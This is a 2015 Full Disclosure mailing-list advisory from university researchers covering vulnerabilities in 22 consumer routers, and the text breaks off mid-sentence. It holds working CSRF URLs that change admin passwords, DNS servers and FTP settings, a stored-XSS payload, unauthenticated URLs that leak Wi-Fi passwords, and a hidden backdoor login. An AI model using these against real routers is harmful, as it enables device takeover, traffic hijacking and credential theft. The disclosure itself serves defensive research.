[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CA+zb8-gqoq7O822yS3koXU_PNj-bq-MnzfMa7Ty=PcnDgO+xMA@mail.gmail.com>
Date: Thu, 28 May 2015 02:10:05 +0200
From: Jose Antonio Rodriguez Garcia <psycojugon@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] More than 60 undisclosed vulnerabilities affect 22 SOHO routers
Dear Full Disclosure community,
we are a group of security researchers doing our IT Security Master's
Thesis at Universidad
Europea de Madrid.
As a part of the dissertation, we have discovered multiple vulnerability
issues on the following SOHO routers:
1. Observa Telecom AW4062
2. Comtrend WAP-5813n
3. Comtrend CT-5365
4. D-Link DSL-2750B
5. Belkin F5D7632-4
6. Sagem LiveBox Pro 2 SP
7. Amper Xavi 7968 and 7968+
8. Sagem Fast 1201
9. Linksys WRT54GL
10. Observa Telecom RTA01N
11. Observa Telecom Home Station BHS-RTA
12. Observa Telecom VH4032N
13. Huawei HG553
14. Huawei HG556a
15. Astoria ARV7510
16. Amper ASL-26555
17. Comtrend AR-5387un
18. Netgear CG3100D
19. Comtrend VG-8050
20. Zyxel P 660HW-B1A
21. Comtrend 536+
22. D-Link DIR-600
The aforementioned vulnerabilities are:
- Persistent Cross Site Scripting (XSS) on #1, #2, #3, #6, #10, #12, #13,
#14, #16, #17, #18, #19 and #20.
- Unauthenticated Cross Site Scripting on #3, #7, #8, #9, #10, #14, #16,
#17 and #19.
- Cross Site Request Forgery (CSRF) on #1, #2, #3, #5, #10, #12, #13, #14,
#15, #16, #18 and #20.
- Denial of Service (DoS) on #1, #5 and #10.
- Privilege Escalation on #1.
- Information Disclosure on #4 and #11.
- Backdoor on #10.
- Bypass Authentication using SMB Symlinks on #12.
- USB Device Bypass Authentication on #12, #13, #14 and #15.
- Bypass Authentication on #13 and #14.
- Universal Plug and Play related vulnerabilities on #2, #3, #4, #5, #6,
#7, #10, #11, #12, #13, #14, #16, #21 and #22.
CVEs have already been requested to MITRE and other CNAs (since MITRE is
taking forever to
assign a CVE) and we are waiting for response. OSVDB IDs have been assigned.
Vendors and manufacturers have already been reported.
All routers have been physically tested.
============================================================================================
Manufacturer: Observa Telecom
Model: AW4062
Tested firmwares: 1.3.5.18 and 1.4.2 (latest)
Comments: Common router that Spanish ISP Telefónica used to give away to
their
ADSL customers specially during 2012.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Multiple Cross-site Scriptings (XSS) found into the
configuration
menu within the router front-web.
These XSS give an attacker the opportunity to execute malicious
scripts.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121211 (http://osvdb.org/show/osvdb/121211)
* PoC:
The threat is found inside some entry inputs that let special characters to
be written in
and show the added information into the web itself.
I.e., there’s a vulnerable input field within the subdirectory Domain
Blocking. When used
legitimately, this input is used to block the traffic between the router
and some particular
domains.
The script will remain stored (persistent XSS) into the field Domain from
the Domain Block
Table and it will be executed each time the victim access to the Domain
Blocking
subdirectory.
This vulnerability can also be found within the input fields that belong to
other
subdirectories like Firewall/URL Blocking, Firewall/Port Forwarding,
Services/DNS/Dynamic
DNS and Advance/SNMP, between others.
The most effective attack is found inside the Advance/SNMP subdirectory. By
injecting the
script into the System Name field, the malicious code will be executed each
time someone
connects to the router because the script is reflected into the home page.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Every input field is vulnerable to Cross Site Request
Forgery
(CSRF) attacks.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121210 (http://osvdb.org/show/osvdb/121210),
OSVDB-121212 (http://osvdb.org/show/osvdb/121212) and
OSVDB-121214 (http://osvdb.org/show/osvdb/121214)
* PoC:
I.e., if an attacker wants the victim to ping a certain IP address in order
to check whether
the victim is already logged into the router, he will send this URL to the
victim:
http://192.168.1.1/goform/formPing?pingAddr=37.252.96.88
It is also possible for an attacker to change the default router password
by sending the
victim this URL:
http://192.168.1.1/goform/formPasswordSetup?userMode=0&oldpass=1234&newpass=12345&confpass=12345&save=%22Apply%20Changes%22
The URL above forces the user with index 0 (it is always going to be the
user named 1234)
to change his default password from 1234 to 12345.
The following URL forces the victim to change his DNS servers to those the
attacker wants to.
http://192.168.1.1/goform/formDNS?dnsMode=dnsManual&dns1=37.252.96.88&dns2=&dns3=
Any action which is available within the website can be attacked through
CSRF.
This includes opening ports, changing the DHCP and NTP servers, modifying
the Wireless
Access point, enabling WPS, etc.
--------------------------------------------------------------------------------------------
---------------------------------- Privilege Escalation
----------------------------------
* Description: Any user without administrator rights is able to carry out a
privilege escalation by reading the public router configuration
file (config.xml). This file stores each of the router configuration
parameters, including the credentials from all users in plain text.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121213 (http://osvdb.org/show/osvdb/121213) and
OSVDB-121285 (http://osvdb.org/show/osvdb/121285)
* PoC:
An user without administrator rights (i.e., user), connects to the router
through FTP.
This user is able to get both /etc/passwd and config.xml files.
The file config.xml stores each of the router configuration parameters in
plain text,
including the credentials from all users.
Doing so, any user is able to gain administrator privileges.
This is critical because not too many people know there is another user
apart from the
administrator one. That means they only change the administrator password,
leaving a
default user with default credentials (user:user) being able to escalate
privileges.
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service
-----------------------------------
* Description: An attacker is able to carry out an external Denial of
Service
attack
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack
through CSRF:
http://192.168.1.1/goform/admin/formReboot
If a victim opens this URL, router commits all the information and reboots
in a process
that takes 60 seconds long.
There are tons of ways for an attacker to do a Denial of Service attack by
exploiting
Cross Site Request Forgery vulnerabilities:
a) Establish new firewall rules in order to block certain URLs, IPs or
MACs. Even setting
up a global Deny order is possible and only allowing traffic from/to
certain IPs/MAcs.
b) Delete the router configuration that allows itself to connect to the
Internet Service
Provider.
c) Disable the Wireless Interface so no device can be connected through the
802.11 protocol.
d) Etc.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: WAP-5813n (tested in Product Numbers 723306-104 and 723306-033)
Tested firmwares: P401-402TLF-C02_R35 and P401-402TLF-C04_R09 (latest one)
Comments: Common router that Spanish ISP Telefónica used to give away to
their FTTH customers from 2011 to 2014
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Wireless>Basic subdirectory allows script
code injection.
The script execution can be clearly seen within the
Wireless>Security and Wireless>MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC:
Every input field is vulnerable to CSRF.
Whenever the administrator user changes his password, he is actually
opening the URL:
/password.cgi?adminPassword=newpassword.
An attacker may send the following URL to the victim, so the administrator
password will
be changed to 1234567890:
http://192.168.1.1/password.cgi?adminPassword=1234567890
If an attacker wants to change the DNS servers, he may use the following
URL to do so once
the victim opens the link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.252.96.88&dnsSecondary=37.252.96.89&dnsIfc=&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: CT-5365
Tested firmwares: A111-306TKF-C02_R16
Comments: Common router that Spanish ISP Telefónica used to give away to
their FTTH customers since 2012
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
I.e., the SSID field within the Wireless>Basic subdirectory allows script
code injection.
The script execution can be clearly seen within the
Wireless>Security and Wireless>MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out actions
such as changing the administrator password.
* Report status: Reported to MITRE on 2015-03-12. Waiting for assignation.
OSVDB-121216 (http://osvdb.org/show/osvdb/121216) and
OSVDB-121217 (http://osvdb.org/show/osvdb/121217)
* PoC:
Every input field is vulnerable to CSRF.
Whenever the administrator user changes his password, he is actually
opening the URL:
/password.cgi?sysPassword=newpassword.
An attacker may send the following URL to the victim, so the administrator
password will be
changed to 1234567890:
http://192.168.1.1/password.cgi?sysPassword=1234567890
If an attacker wants to change the DNS servers, he may use the following
URL to do so once
the victim opens the link:
http://192.168.1.1/dnscfg.cgi?dnsPrimary=37.56.61.35.88&dnsSecondary=80.58.61.34&dnsDinamic=0&dnsRefresh=1
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored into the hostname field within the
Connected Clients
list (Device Info -> DHCP).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122383 (http://osvdb.org/show/osvdb/122383)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: D-Link
Model: DSL-2750B
Tested firmwares: EU_1.01
Comments:
--------------------------------------------------------------------------------------------
------------------ Information Disclosure (Insecure Object References)
-------------------
* Description: An attacker is able to obtain critical information without
being
logged in.
* Report status: Reported to MITRE on 2015-03-25. Waiting for assignation.
OSVDB-121219 (http://osvdb.org/show/osvdb/121219)
* PoC:
By accessing the URL http://192.168.1.1/hidden_info.html, browser shows
huge amount of
parameters such as SSID, Wi-Fi password, PIN code, etc. without requiring
any login process.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122384 (http://osvdb.org/show/osvdb/122384)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Belkin
Model: F5D7632-4
Tested firmwares: 6.01.04
Comments:
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities
within
the router website allow an external attacker to carry out
malicious actions.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on
2015-04-15.
Waiting for assignation.
OSVDB-121220 (http://osvdb.org/show/osvdb/121220)
* PoC:
Every input field is vulnerable to CSRF.
I.e., if an attacker wants to change the DNS servers, he may use the
following URL to do so:
http://192.168.2.1/cgi-bin/setup_dns.exe?page=
"setup_dns"&logout=""&dns1_1=37&dns1_2=252
&dns1_3=96&dns1_4=88&dns2_1=37&dns2_2=252&dns2_3=96&dns2_4=89
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service
-----------------------------------
* Description: An attacker is able to carry out an external Denial of
Service
attack.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on
2015-04-15.
Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack
through CSRF:
http://192.168.2.1/cgi-bin/restart.exe?page="tools_gateway"&logout=""
This URL causes the router to reboot, interrupting any active connection
and denying the
service for about 20 seconds.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122389 (http://osvdb.org/show/osvdb/122389)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: LiveBox 2 Pro
Tested firmwares: FAST3yyy_671288
Comments: Common router that ISP Orange used to give away to their ADSL
customers.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code, even if the victim is not logged into the router
web-config page.
* Report status: Reported to CERT on 2015-04-14. Reported to MITRE on
2015-04-15.
Waiting for assignation.
OSVDB-121223 (http://osvdb.org/show/osvdb/121223)
* PoC:
Despite the fact that most of the input fields do not allow special
characters to be
written in, there are still some of them in which a XSS can be performed.
1. The SSID field within the “Configuración-> Equipos -> Personalizar”
(Configuration->Devices->Personalize) subdirectory allows script code
injection.
The script execution can be clearly seen within the “Configuración->
Equipos -> Mostrar”
(Configuration->Devices->Show) subdirectory.
2. The SSID field within the “Configuración-> LiveBox-> Configuracion Wifi
-> SSID-name”
(Configuration->LiveBox->Wi-Fi Configuration->SSID-Name) subdirectory
allows script
code injection.
The script execution can be clearly seen within the main log-in webpage,
even if the
user is not logged in.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122387 (http://osvdb.org/show/osvdb/122387)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Amper
Model: Xavi 7968 and Xavi 7968+
Tested firmwares: 3.01APT94 (latest one)
Comments: Common router that ISP Telefónica used to give away to their ADSL
customers from 2010 to 2013.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored into the hostname field within the
Connected Clients
list (/webconfig/status/dhcp_table.html).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify the WPS
configuration
by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the WPS
configuration or
resetting the AP to default settings.
============================================================================================
============================================================================================
Manufacturer: Sagem
Model: Fast 1201
Tested firmwares: 3.01APT94 (latest one)
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121222 (http://osvdb.org/show/osvdb/121222)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored into the hostname field within the DHCP
Leases
list (dhcpinfo.html).
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Linksys
Model: WRT54GL
Tested firmwares: 4.30.16 build 6
Comments: -
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-04-15. Waiting for assignation.
OSVDB-121221 (http://osvdb.org/show/osvdb/121221)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored into the hostname field within the
Connected Clients
list (DHCPTable.asp). It can be accessed either directly through the URL or
through the
Status-> Local Network -> DHCP Clients Table subdirectories.
Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: RTA01N
Tested firmwares: RTK_V2.2.13
Comments: Common router that Spanish ISP Telefónica used to give away to
their
ADSL/VDSL customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Multiple Cross-site Scriptings (XSS) found into the
configuration
menu within the router front-web. These XSS give an attacker the
opportunity to execute malicious scripts.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121787 (http://osvdb.org/show/osvdb/121787) and
OSVDB-121788 (http://osvdb.org/show/osvdb/121788)
* PoC:
The threat is found inside some entry inputs that let special characters to
be written in
and show the added information into the web itself.
I.e., Nombre del host (Hostname) input field within the subdirectory
Servicio -> DDNS
(Service -> DDNS or /ddns.htm) is vulnerable.
There is another vulnerable input field within the Mantenimiento ->
Contraseña
(Maintenance -> Password or /userconfig.htm) subdirectory.
After creating a user whose username contains the malicious script, it is
stored into the
User Accounts table and executes once the victim accesses this subdirectory.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Every input field is vulnerable to Cross Site Request
Forgery
(CSRF) attacks.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121786 (http://osvdb.org/show/osvdb/121786)
* PoC:
I.e., if an attacker wants to change the DNS servers, he may use the
following URL to do so
once the victim opens the link:
http://192.168.1.1/form2Dns.cgi?dnsMode="1"&dns1="37.252.96.88"&dns2="37.252.96.89"&dns3=""&submit.htm?dns.htm="Send"&save="Aplicar
cambios"
It is also possible for an attacker to change the default router
administrator password by
sending the victim this URL:
http://192.168.1.1/form2userconfig.cgi?
username="1234"&privilege=2&oldpass="1234"&newpass="newpass"&confpass="newpass"&modify="Modificar"&select="s0"&hiddenpass="1234"&submit.htm?userconfig.htm="Send"
The URL above forces the administrator user (it is always going to be the
user named 1234)
to change his default password from 1234 to newpass.
--------------------------------------------------------------------------------------------
------------------------------------ Denial of Service
-----------------------------------
* Description: An attacker is able to carry out an external Denial of
Service
attack
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
* PoC:
It is possible for an attacker to carry out a Denial of Service attack
through CSRF:
http://192.168.1.1/form2Reboot.cgi?rebootMode=0&reboot=
"Reiniciar"&submit.htm?reboot.htm="Send"
If a victim opens this URL, router replies with HTTP 200 OK status code and
reboots.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting
--------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an
attacker to
inject malicious code within the router configuration website by
sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121789 (http://osvdb.org/show/osvdb/121789)
* PoC:
An external attacker is able to inject malicious code within the router
website without
requiring any login process.
This is achieved by sending a DHCP Request PDU containing the malicious
script within the
hostname parameter.
The malicious code will be stored within the DHCP Active Clients table
(/dhcptbl.html).
Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
----------------------------------------- Backdoor
---------------------------------------
* Description: There is a second default administrator user who is hidden
to the
legitimate router owner.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121785 (http://osvdb.org/show/osvdb/121785)
* PoC:
In addition to the well-known 1234 administrator user, there is another one
named admin,
whose password is 7449airocon.
This superuser remains hidden (it does only appear into the backup
configuration XML file)
and is able to modify any configuration settings either through the web
interface or
through telnet.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall
rules,
carry out a persistent denial of service and obtain the WLAN
passwords, between other things, by using the supported Universal
Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
It is also possible for an attacker to change the WPS configuration
settings, reset the AP
to the default ones and obtain critical information, such as WLAN passwords.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: Home Station BHS-RTA
Tested firmwares: v1.1.3
Comments: Common router that Spanish ISP Telefónica used to give away to
their
ADSL/VDSL customers
--------------------------------------------------------------------------------------------
--------------------------------- Information Disclosure
---------------------------------
* Description: Observa Telecom Home Station BHS-RTA web interface allows an
external attacker to obtain critical information without login
process.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121781 (http://osvdb.org/show/osvdb/121781),
OSVDB-121782 (http://osvdb.org/show/osvdb/121782),
OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and
OSVDB-121784 (http://osvdb.org/show/osvdb/121784)
* PoC:
Without requiring any login process, an external attacker is able to obtain
critical
information such as the WLAN password and settings, the Internet
configuration, a list of
connected clients, etc.
By accessing the following URL, browser shows WLAN configuration, including
the passwords:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101
By accessing the following URL, browser shows a list of connected clients,
including their
IP and MAC addresses:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101
By accessing the following URL, browser shows the Internet configuration
parameters:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134
By accessing the following URL, browser shows whether the administrator
password has been
changed or is the default one.
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules
and
carry out a persistent denial of service by using the supported
Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is supported by the device.
This protocol has
lots of weaknesses, such as the lack of an authentication process, which
can be exploited
by attackers.
The device supports multiple UPnP actions, such as changing the firewall
rules
(AddPortMapping) or the termination of any WAN connections
(ForceTermination).
These actions allow an attacker to carry out a persistent denial of service
(router needs
to be factory reset to work properly again) or open critical ports, even
for remote hosts
which are not into the LAN.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: VH4032N
Tested firmwares: VH4032N_V0.2.35
Comments: Common router that ISP Vodafone used to give away to their
customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting
----------------------------
* Description: Some input fields within the router website are vulnerable
to
Cross-site Scripting (XSS) attacks, allowing an attacker to execute
malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121793 (http://osvdb.org/show/osvdb/121793)
* PoC:
The threat is found inside some entry inputs that let special characters to
be written in
and show the added information into the web itself.
I.e, the SSID input field is vulnerable if the following code is written in:
‘; </script><script>alert(1)</script><script>//
The malicious code will be executed throughout the whole web interface.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery
-------------------------------
* Description: Every input field is vulnerable to Cross Site Request
Forgery
(CSRF) attacks.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and
OSVDB-121792 (http://osvdb.org/show/osvdb/121792)
* PoC:
Although the existence of a token related to session ID, configuration
settings can be
modified without the need of it. Thus, every input field is vulnerable to
CSRF attacks.
I.e., if an attacker wants to change the administrator password, he may use
the following
URL to do so once the victim opens the link:
http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass
If an attacker wants to change the FTP server configuration settings, such
as the password
and the allowance of remote FTP WAN connections, he may use the following
link:
http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2
--------------------------------------------------------------------------------------------
------------------------ Bypass Authentication using SMB Symlinks
------------------------
* Description: An external attacker, without requiring any login process,
is able
to download the whole router kernel filesystem, including all the
configuration information and the user account information files,
by creating symbolic links through the router Samba server.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121790 (http://osvdb.org/show/osvdb/121790)
* PoC:
An unauthenticated attacker is able to download the whole router filesystem
by connecting
to the Samba server.
There is a shared service (called storage) in which it is possible to
create symbolic links
to the router filesystem and download the content. I.e., a symlink to / is
possible and
allows the attacker to freely view and download the entire filesystem.
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication
----------------------------
* Description: An external attacker, without requiring any login process,
is able
to view, modify, delete and upload new files to the USB storage
device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121794 (http://osvdb.org/show/osvdb/121794)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is
able to
download, modify the content and upload new files, without requiring any
login process.
In order to do so, the attacker only needs to access the router IP followed
by the 9000 port.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play
---------------------------------
* Description: An unauthenticated attacker is able to modify the WPS
configuration
by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignation.
OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC:
The Universal Plug and Play (UPnP) protocol is enabled by default on the
device. This
protocol has lots of weaknesses, such as the lack of an authentication
process, which can
be exploited by attackers.
The device supports multiple UPnP actions, such as changing the WPS
configuration or
resetting the AP to default settings.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG553
Tested firmwares: V100R001C03B043SP01
Comments: Common router that ISP Vodafone used to give away to their
customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication
----------------------------
* Description: An external attacker, without requiring any login process,
is able
to view, modify, delete and upload new files to the USB storage
device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignation.
OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC:
If a USB storage device is hooked up to the router, an external attacker is
able to
download, modify the content and upload new files, without requiring any
login process.
In order to do so, the attacker only needs to access the router IP followed
by the 9000 port.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication
----------------------------------
* Description: An external attacker, without requiring any login process,
is able
to reset the router settings to default ones besides bringing a
